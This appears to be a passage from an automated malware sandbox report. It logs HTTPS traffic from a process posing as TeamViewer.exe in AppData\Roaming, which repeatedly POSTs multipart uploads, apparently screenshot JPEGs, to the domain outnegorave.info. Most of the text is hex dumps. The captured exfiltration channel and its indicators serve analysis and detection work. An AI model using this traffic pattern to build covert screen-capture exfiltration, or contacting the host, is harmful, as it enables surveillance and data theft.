                                                                                                                                    Data Ascii: ----------3962184161Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:05 UTC511OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 3d 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^=;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:05 UTC511OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:05 UTC527OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:05 UTC543OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:05 UTC559OUTData Raw: 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29 68 00 a5 a4 a5 a0 05 a5 a6 d3 a8 13 0a 51 49 4b 40 85 a2 92 96 81 05 2d 14 53 00 a5 14 52 8a 04 c5 a0 52 52 8a 04 68 69 23 f7 ee 7d 10 d5 63 d4 fd 6a d6 93 fe ba 4f f7 4d 55 3d 4f d6 b2 5f 1b 09 fc 28 28 a2 8a d0 c8 29 69 29 68 10 b4 52 52 d2 13 16 8a 28 a0 02 94 51 45 21 0b 45 14 52 10 b4 a2 92 81 40 87 52 af 5a 6d 2d 26 08 b7 11 ad
                                                                                                                                    Data Ascii: QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRhi#}cjOMU=O_(()i)hRR(QE!ER@RZm-&
                                                                                                                                    2021-09-15 11:52:05 UTC575OUTData Raw: c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45 14 08 5a 28 a4 a0 02 8a 28 a0 02 96 92 96 80 0a 28 a2 81 05 14 51 4c 02 8a 28 a0 02 96 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 01 45 14 0a 5a 62 12 8a 5a 28 00 a2 8a 28 10 51 45 14 c0 29 68 a2 80 0a 28 a2 80 0a 5a 28
                                                                                                                                    Data Ascii: FiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QEZ(((QL(((((EZbZ((QE)h(Z(
                                                                                                                                    2021-09-15 11:52:05 UTC591OUTData Raw: 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc b9 c7 ae d1 9f d6 b1 6b 6a 72 e7 82 97 74 71 49 59 b4 14 51 4b 56 20 a4 a5 a2 80 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a4 01 45 14 50 02 51 4b 49 40 05 14 51 40 05 2d 25 14 00 51 45 14 00 51 45 14 00
                                                                                                                                    Data Ascii: Vx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+kjrtqIYQKV (((((EPQKI@Q@-%QEQE
                                                                                                                                    2021-09-15 11:52:05 UTC593OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 39 36 32 31 38 34 31 36 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3962184161--
                                                                                                                                    2021-09-15 11:52:05 UTC594INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:05 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3e32c448e2565fe072e94ce275d9daffacb854e72f233573e0ca0096e875c7bd; expires=Thu, 15-Sep-2022 11:52:05 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=32C36IPAAHhsGohK2WeeQppPTfijY2hIFBdq6i6vHLGDXJ3KT3c0FUc1GPAW7VmZtMwENC%2Fb63OVEwTzQSrO5dJ1UY7ZGetXSyAzwbXe%2FEnZKIrei6GM6tDWWMcft%2BGX3rGR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5993cd6699f-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:05 UTC594INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    7192.168.2.549764172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:06 UTC594OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84962
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1422274513
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:06 UTC595OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 32 32 37 34 35 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1422274513Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:06 UTC595OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 67 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^g;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:06 UTC595OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:06 UTC611OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:06 UTC627OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:06 UTC643OUTData Raw: 16 81 49 46 69 88 75 14 94 b4 c0 28 a2 96 81 05 2d 14 62 98 85 a5 a4 a2 98 80 d2 8a 4a 51 40 0a 29 29 45 21 a6 20 a5 a4 a0 52 01 c2 9c 29 b4 b5 48 4c 5a 29 29 69 80 b4 51 45 04 8b 45 14 53 00 a2 8a 28 10 e1 4b 4d 14 a2 9a 01 69 69 29 69 92 14 b4 94 a2 98 0b 45 14 53 10 b4 52 52 d0 20 a5 a4 a5 a6 80 75 14 82 96 99 21 4a 28 a2 98 0b 45 02 96 98 84 a4 a5 a2 80 10 75 a7 d3 07 5a 7d 08 18 50 68 a2 99 20 29 69 05 3b 14 20 62 81 4e a6 d3 85 52 25 89 de 96 90 f5 a7 0a 60 20 a7 53 69 45 31 31 68 a2 8a 04 02 96 90 53 a9 88 4a 75 25 14 c1 8e a5 a6 8a 5a 64 8e cd 28 a6 d2 8a 68 4c 70 a5 a6 d3 85 32 58 52 d2 51 4c 42 d1 49 4b 40 05 2d 25 2d 00 2d 2d 36 9d 40 98 52 8a 4a 5a 04 2d 14 94 b4 08 29 68 a2 98 05 28 a2 94 50 26 2d 02 92 94 50 23 43 49 1f bf 73 e8 86 ab 1e a7
                                                                                                                                    Data Ascii: IFiu(-bJQ@))E! R)HLZ))iQEES(KMii)iESRR u!J(EuZ}Ph )i; bNR%` SiE11hSJu%Zd(hLp2XRQLBIK@-%---6@RJZ-)h(P&-P#CIs
                                                                                                                                    2021-09-15 11:52:06 UTC659OUTData Raw: 69 b4 b4 08 70 a2 92 96 a8 42 8a 5a 6e 69 69 88 76 69 69 b4 b4 08 70 a5 14 da 50 6a 93 25 92 0a 29 01 a2 a9 12 2d 2d 25 19 a6 16 17 34 66 90 52 d1 71 58 51 4b 9a 65 2e 69 dc 2c 3f 34 b4 cc d2 e6 99 36 1c 29 73 4d cd 14 ee 16 1f 9a 33 4d cd 1b bd a8 b8 ac 48 0d 2e 6a 3d c7 d6 8c fb d3 b8 ac 49 91 46 6a 3c d2 e6 8b 8a c3 f3 46 69 b9 a3 34 ee 16 1d 4b 9a 6d 19 a2 e2 b0 ec d2 e6 99 9a 33 4e e1 61 f9 a3 34 cd d4 9b a8 b8 72 92 66 8c d4 7b a8 dd 4a e1 ca 49 ba 93 75 44 5e 9a 5e 87 21 a8 13 16 a6 97 a8 8b d3 4b 54 b9 94 a0 4a 5e 98 5e a3 2d 4c 2d 50 e4 5a 81 21 7f 7a 61 6a 61 6a 61 6a 87 23 45 11 e5 a9 85 a9 a5 a9 85 ab 37 23 45 11 c4 d3 09 a4 26 92 a1 b2 d2 14 9a 4a 4a 33 49 8e c2 1a 28 34 da 92 90 66 8a 4a 4a 57 1d 8a 18 ef 4b 49 45 72 9d 62 d1 45 18 a0 02 8a
                                                                                                                                    Data Ascii: ipBZniiviipPj%)--%4fRqXQKe.i,?46)sM3MH.j=IFj<Fi4Km3Na4rf{JIuD^^!KTJ^^-L-PZ!zajajaj#E7#E&JJ3I(4fJJWKIErbE
                                                                                                                                    2021-09-15 11:52:06 UTC675OUTData Raw: cf 6b ff 00 0d 75 0b 3d d3 69 12 7d b6 11 cf 96 d8 59 47 f4 6f d3 e9 4c f1 07 c3 8d 46 c3 74 da 53 1b e8 07 3b 00 c4 aa 3e 9f c5 f8 73 ed 5d 07 84 7c 0d a1 9b 58 ef ae 65 fe d1 90 f5 46 5d a9 1b 77 52 9d 72 3b 86 fc a9 01 e5 73 45 24 12 b4 53 c6 f1 c8 87 0c 8e a4 10 7d c1 a6 57 47 f1 09 12 3f 1a df a4 6a a8 8a 22 01 54 60 01 e5 25 73 95 42 0a b7 a6 d9 35 f5 d0 8c 1d a8 39 76 f4 15 52 ba 0f 0b ed c5 c8 3d 7e 5f cb 9a 99 3b 2d 08 a9 51 53 5c ed 5e c6 e5 9e 8d 6e 13 65 b5 98 93 68 e4 94 dc 7f 1a af a8 78 70 5c 2b 08 ed 5a 19 87 42 a8 47 e6 2b 74 6f fe cd b7 11 64 c6 33 bf 1f df cf 7f c3 15 b7 a6 f9 bf 61 4f 3f 3b b2 76 ee eb b7 b7 f5 ac 31 34 a5 43 0e b1 0a 5a f6 3d 18 63 a9 d6 9f b2 8c 3d d3 c5 a6 89 e0 99 e2 95 4a ba 12 ac 0f 63 4c ad af 18 f9 7f f0 94 5e
                                                                                                                                    Data Ascii: ku=i}YGoLFtS;>s]|XeF]wRr;sE$S}WG?j"T`%sB59vR=~_;-QS\^nehxp\+ZBG+tod3aO?;v14CZ=c=JcL^
                                                                                                                                    2021-09-15 11:52:06 UTC678OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 32 32 37 34 35 31 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1422274513--
                                                                                                                                    2021-09-15 11:52:06 UTC678INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:06 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=4c3a5526c817afa646186a01761d251df18ffe651d1b26458685ed6875a83c4d; expires=Thu, 15-Sep-2022 11:52:06 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZXopL8eItBBq2J6qFZiRQimk%2FSbTvM6MRwQqmZ5at8gfPSa2Zs7Xb22d6NyedPwnOMRbTHH36CEYSe0hfGPGi5QVuw9Co3RyMumucSB%2Fx%2Bn3H0miSF8CBVtfQZExOIrDBay"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5a098d44e7a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:06 UTC679INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    8192.168.2.549767172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:07 UTC679OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85001
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1112577220
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:07 UTC679OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 31 31 32 35 37 37 32 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1112577220Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:07 UTC679OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 66 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^f;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:07 UTC679OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
